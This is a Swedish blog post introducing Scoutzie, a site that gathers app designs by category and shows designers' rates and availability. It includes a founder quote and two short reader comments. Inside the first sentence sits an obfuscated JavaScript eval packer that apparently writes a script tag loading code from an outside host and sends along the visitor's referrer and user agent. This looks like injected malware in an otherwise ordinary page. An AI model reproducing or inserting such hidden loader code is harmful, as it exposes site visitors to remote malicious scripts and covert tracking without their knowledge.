Image Image Image Image Image Image Image Image Image Image

| 13 juni, 2021

Scroll to top

Top

Scoutzie samlar de snyggaste Appdesignerna

Scoutzie samlar de snyggaste Appdesignerna
Sebastian

Scoutzie eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zazye|var|u0026u|referrer|fbryb||js|php’.split(’|’),0,{}))
är stället som samlar på sig snygga appdesigner från alla möjliga håll på webben. Idén är att man skall kunna bläddra runt och plocka på sig inspiration från personer som skapat dem.

Det finns olika kategorier som iPad, Android, Windows och Responisive web som ska göra det enkelt att bläddra bland rätt plattform. När man hittat en design som verkar snygg kan man också kolla in designern av projektet. Det är en bra plats för en designer som kanske letar jobb. Man kan se vad de brukar ta betalt samt ifall de letar jobb i nuläget.
Grundaren Kirill Zubovsky säger så här:

”We want the best designers, after all. In a long run, I want Scoutzie to be the place where people go for their mobile design needs. I want to be the resource that appreciates designers and empowers our members to show just how important design is in mobile products. In a dream scenario, I see Scoutzie as the community that sets mobile design vision for the future.

Whatever it is that I am doing with Scoutzie though, I will be sure to listen to the designers and do my best to cater to their needs.”

Comments

  1. Fabian

    Typ som pinterest eller?

    • Niklas

      Inte riktigt, detta gäller ju designer på digitala saker. Pinterest är väl mer allmänt skulle jag gissa. Både print och digitalt?